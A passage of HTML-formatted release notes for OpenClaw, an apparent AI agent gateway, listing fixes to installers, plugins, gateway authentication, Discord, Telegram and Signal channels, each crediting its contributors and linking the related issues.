<li>Gateway/Bonjour: suppress known @homebridge/ciao cancellation and network assertion failures through scoped process handlers so malformed mDNS packets or restricted VPS networking disable/restart Bonjour instead of crashing the gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274075946" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67578" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67578/hovercard" href="https://github.com/openclaw/openclaw/issues/67578">#67578</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zenassist26-create/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zenassist26-create">@zenassist26-create</a>.</li>
<li>Discord: keep late clicks on already-resolved exec approval buttons quiet when elevated mode auto-resolved the request, while still surfacing real approval submission failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265667453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66906" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66906/hovercard" href="https://github.com/openclaw/openclaw/issues/66906">#66906</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rlerikse/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rlerikse">@rlerikse</a>.</li>
<li>Agents/subagents: deliver completed yielded-subagent results back to no-thread requester routes via direct fallback when the dormant parent announce turn produces no visible reply, and add QA-lab coverage for the regression. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/Tailscale: let Tailscale-authenticated Control UI operator sessions with browser device identity skip the device-pairing round trip while still rejecting device-less and node-role connections. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330113557" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71986/hovercard" href="https://github.com/openclaw/openclaw/issues/71986">#71986</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jokedul/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jokedul">@jokedul</a>.</li>
<li>Doctor: honor <code>OPENCLAW_SERVICE_REPAIR_POLICY=external</code> by reporting gateway service health while skipping service install/start/restart/bootstrap, supervisor rewrites, and legacy service cleanup for externally managed environments. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: run package post-update doctor with <code>--fix</code> so package updates repair config migrations before restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/update: retry failed npm global updates with <code>--omit=optional</code> and ignore the superseded first failure when the fallback succeeds. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/uninstall: migrate and reset <code>plugins.slots.contextEngine</code> alongside memory slots when plugin ids change or selected plugins are removed. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/Discord: keep raw <code>Agent failed before reply</code> runner failures out of Discord group/channel chats and show detailed runner errors in direct chats only when <code>/verbose</code> is enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/codex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/codex">@codex</a>.</li>
<li>UI/Windows: quote resolved pnpm <code>.cmd</code> launcher paths before spawning UI install/build/test commands so Node installs under <code>C:\Program Files</code> no longer fail as <code>C:\Program</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072094242" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45275" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45275/hovercard" href="https://github.com/openclaw/openclaw/issues/45275">#45275</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobevictor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobevictor">@Kobevictor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stoppieboy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stoppieboy">@stoppieboy</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iubns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iubns">@iubns</a>.</li>
<li>Codex/agent: translate <code>--thinking minimal</code> to <code>low</code> for modern Codex models (gpt-5.5, gpt-5.4, gpt-5.4-mini, gpt-5.2) at request build time so the first turn is accepted instead of paying a wasted call + retry-with-low fallback. Older Codex models still receive <code>minimal</code> directly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329994264" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71946" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71946/hovercard" href="https://github.com/openclaw/openclaw/issues/71946">#71946</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/uninstall: remove tracked plugin files from their recorded managed extensions root even when the current state directory points somewhere else, so <code>openclaw plugins uninstall --force</code> does not leave the plugin discoverable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Agents/runtime: add <code>agentRuntime.id</code> as the canonical config key, migrate legacy runtime-policy configs with <code>openclaw doctor --fix</code>, route canonical Anthropic models through <code>claude-cli</code> without passing CLI backend aliases to embedded harness selection, and load CLI backend owner plugins before channel startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330015913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71957" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71957/hovercard" href="https://github.com/openclaw/openclaw/issues/71957">#71957</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</li>
<li>CLI/update: guard Windows scheduled-task stops by state and timeout so auto-update restart cannot hang indefinitely on <code>schtasks /End</code> before stale-listener cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306617089" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69970" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69970/hovercard" href="https://github.com/openclaw/openclaw/issues/69970">#69970</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yangswld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yangswld">@yangswld</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sherlock-huang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sherlock-huang">@sherlock-huang</a>.</li>
<li>Windows install/Lobster: execute <code>pnpm.exe</code> directly when <code>npm_execpath</code> points at the native pnpm binary, add an installed-package fallback for the Lobster embedded runtime, and include the Lobster runner regression test in Windows CI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298637607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69456" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69456/hovercard" href="https://github.com/openclaw/openclaw/issues/69456">#69456</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/igormf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/igormf">@igormf</a>.</li>
<li>Gateway/install: refresh loaded gateway service installs when the current service embeds stale gateway auth instead of returning already-installed, avoiding LaunchAgent token-mismatch loops after token rotation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318448606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70752/hovercard" href="https://github.com/openclaw/openclaw/issues/70752">#70752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hyspacex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hyspacex">@hyspacex</a>.</li>
<li>Update: ignore bundled plugin <code>.openclaw-install-stage</code> directories during global install verification and packaged dist pruning so leftover runtime-dep staging files do not turn successful updates into <code>unexpected packaged dist file</code> failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329154464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71752/hovercard" href="https://github.com/openclaw/openclaw/issues/71752">#71752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/waynegault/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/waynegault">@waynegault</a>.</li>
<li>CLI/update: fail package updates when post-update plugin sync fails and refresh legacy npm plugin install records before trusting unchanged artifacts, preventing successful updates from restarting with stale or failed plugin state. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Release/update: reject pre-populated bundled plugin <code>.openclaw-install-stage</code> directories, including mixed-case path variants, before package inventory generation so release tarballs cannot ship poisoned runtime-dependency staging debris. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329154464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71752/hovercard" href="https://github.com/openclaw/openclaw/issues/71752">#71752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Node runtime: keep node-host retry timers alive across Gateway restarts and exit on terminal credential pauses so supervised nodes do not become silent zombies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4304346722" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69800" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69800/hovercard" href="https://github.com/openclaw/openclaw/issues/69800">#69800</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/meroli28/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/meroli28">@meroli28</a>.</li>
<li>Gateway/plugins: stop persisted WhatsApp auth state from activating bundled channel runtime-dependency repair during startup when <code>channels.whatsapp</code> is absent, avoiding npm/git stalls on packaged Linux installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330154277" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71994" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71994/hovercard" href="https://github.com/openclaw/openclaw/issues/71994">#71994</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xiao398008/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiao398008">@xiao398008</a>.</li>
<li>Gateway/device tokens: enforce caller-scope containment inside token rotation and revocation so pairing-only sessions cannot mutate higher-scope operator tokens. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330129522" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71990" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71990/hovercard" href="https://github.com/openclaw/openclaw/issues/71990">#71990</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coygeek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coygeek">@coygeek</a>.</li>
<li>Plugins/channels: keep security checks, thread-binding placement, provider summaries, health formatting, and message action labels on read-only or already-loaded channel metadata instead of importing full channel runtime. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/status: keep config-only channel labels and status security summaries from importing plugin runtime modules just to render metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Sessions/channels: stop group-session metadata from loading bundled channel runtime just to classify <code>#channel</code> subjects, using only already-loaded channel capabilities on that path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/channels: keep native command and native skill <code>auto</code> defaults on static channel metadata so config, audit, and command-list checks do not load channel runtime just to read those defaults. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/channels: keep channel remove selection and all-channel capabilities summaries on read-only plugin metadata, loading channel runtime only for the selected mutation path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: keep Provider Index preview rows out of <code>models list --all --provider &lt;id&gt;</code> when the owning provider plugin is disabled, preserving config authority for cold catalog fallbacks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/model runs: keep <code>openclaw infer model run</code> on explicit OpenRouter models from loading the full provider catalog or inheriting chat-agent silent-reply policy, restoring non-empty one-shot probe output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289787526" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68791" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68791/hovercard" href="https://github.com/openclaw/openclaw/issues/68791">#68791</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/limpredator/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/limpredator">@limpredator</a>.</li>
<li>Installer/macOS: rerun Homebrew install steps without the gum spinner when raw-mode ioctl failures occur, and avoid claiming <code>node@24</code> was installed when the Homebrew keg binary is missing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312670571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70411" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70411/hovercard" href="https://github.com/openclaw/openclaw/issues/70411">#70411</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/1fanwang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/1fanwang">@1fanwang</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dad-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dad-io">@dad-io</a>.</li>
<li>Installer: load nvm before Node.js detection so <code>curl | bash</code> installs respect nvm-managed Node instead of stale system Node. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4093236636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49556" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49556/hovercard" href="https://github.com/openclaw/openclaw/issues/49556">#49556</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/heavenlxj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/heavenlxj">@heavenlxj</a>.</li>
<li>Installer/Windows: route PowerShell install failures through a top-level handler so <code>iwr ... | iex</code> returns control to the current shell while direct script-file runs still exit non-zero. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4034858716" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/38054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/38054/hovercard" href="https://github.com/openclaw/openclaw/issues/38054">#38054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PwrSrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PwrSrg">@PwrSrg</a>.</li>
<li>CLI/Volta: respawn raw <code>openclaw</code> CLI runs through the named <code>node</code> shim when the current Node executable resolves to <code>volta-shim</code>, avoiding direct shim execution failures in non-interactive shells. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288940390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68672" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68672/hovercard" href="https://github.com/openclaw/openclaw/issues/68672">#68672</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanchezm86/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanchezm86">@sanchezm86</a>.</li>
<li>Installer: warn when multiple npm global roots contain OpenClaw installs, showing active Node/npm/openclaw plus each install path and version so stale version-manager installs are visible. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4044590366" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/40839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/40839/hovercard" href="https://github.com/openclaw/openclaw/issues/40839">#40839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhixianio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhixianio">@zhixianio</a>.</li>
<li>Cron/tasks: recover completed cron task ledger records from durable run logs and job state before marking them <code>lost</code>, reducing false <code>backing session missing</code> audit errors for isolated cron runs and keeping offline CLI audit from treating its empty local cron active-job set as authoritative. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330026583" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71963" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71963/hovercard" href="https://github.com/openclaw/openclaw/issues/71963">#71963</a>.</li>
<li>Docker: copy patched dependency files into runtime images so downstream <code>pnpm install</code> layers keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293534495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69224/hovercard" href="https://github.com/openclaw/openclaw/issues/69224">#69224</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a>.</li>
<li>Package: include patched dependency files in the published npm package so downstream installs can resolve <code>patchedDependencies</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293534495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69224" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69224/hovercard" href="https://github.com/openclaw/openclaw/issues/69224">#69224</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gucasbrg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gucasbrg">@gucasbrg</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/channels: treat malformed bundled channel plugin loaders that return <code>undefined</code> as unavailable instead of crashing config and help paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291595561" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69044" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69044/hovercard" href="https://github.com/openclaw/openclaw/issues/69044">#69044</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/frankhli843/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/frankhli843">@frankhli843</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Scripts/watch: show corrupted dependency package-config recovery guidance when <code>gateway:watch</code> fails during watcher startup, without double-logging unrelated import failures. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184421615" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58780" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58780/hovercard" href="https://github.com/openclaw/openclaw/pull/58780">#58780</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roytong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roytong9">@roytong9</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Signal: read signal-cli RPC, health checks, and SSE events through Node's HTTP client so Node 24/25 fetch regressions do not break Signal sends or inbound events. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112941905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51716/hovercard" href="https://github.com/openclaw/openclaw/issues/51716">#51716</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4122411587" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53040/hovercard" href="https://github.com/openclaw/openclaw/issues/53040">#53040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Barukimang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Barukimang">@Barukimang</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/minupla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/minupla">@minupla</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Skills/Docker: run npm-backed skill dependency installs with an OpenClaw-managed user prefix so non-root Docker images do not write to <code>/usr/local</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4193497158" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59601" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59601/hovercard" href="https://github.com/openclaw/openclaw/issues/59601">#59601</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chanjarster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chanjarster">@chanjarster</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/runtime: submit heartbeat, cron, and exec wakeups as transient runtime context instead of visible user prompts, keeping synthetic system work out of chat transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261476582" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66496" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66496/hovercard" href="https://github.com/openclaw/openclaw/issues/66496">#66496</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264783156" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66814" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66814/hovercard" href="https://github.com/openclaw/openclaw/issues/66814">#66814</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeades/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeades">@jeades</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mandomaker/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mandomaker">@mandomaker</a>.</li>
<li>Telegram: include native quote excerpts automatically for threaded replies and reply tags when the original Telegram text is available, without adding another config knob. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3884461774" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6975/hovercard" href="https://github.com/openclaw/openclaw/issues/6975">#6975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rex05ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rex05ai">@rex05ai</a>.</li>
<li>Node/Linux: make <code>openclaw node install</code> enable and restart the <code>openclaw-node</code> systemd unit instead of the gateway unit on node-only VMs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285532256" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68287" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68287/hovercard" href="https://github.com/openclaw/openclaw/issues/68287">#68287</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dlebee-agent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dlebee-agent">@dlebee-agent</a>.</li>
<li>Browser/CDP: retry transient raw-CDP WebSocket handshake failures before any browser command is sent, and reconnect stale persistent Playwright CDP sessions for safe tab-list reads without replaying mutating browser actions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276826431" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67728" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67728/hovercard" href="https://github.com/openclaw/openclaw/issues/67728">#67728</a>.</li>
<li>Gateway/Linux: retry <code>systemctl --user enable</code> after a second daemon reload when the freshly written gateway unit is not visible yet on migrated systemd installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246585581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65184" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65184/hovercard" href="https://github.com/openclaw/openclaw/issues/65184">#65184</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liushuaiiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liushuaiiu">@liushuaiiu</a>.</li>
<li>Telegram: preserve exact selected quote text when sending native quote replies, and retry with legacy replies if Telegram rejects quote parameters. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330007852" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71952" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71952/hovercard" href="https://github.com/openclaw/openclaw/pull/71952">#71952</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rubencu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rubencu">@rubencu</a>.</li>
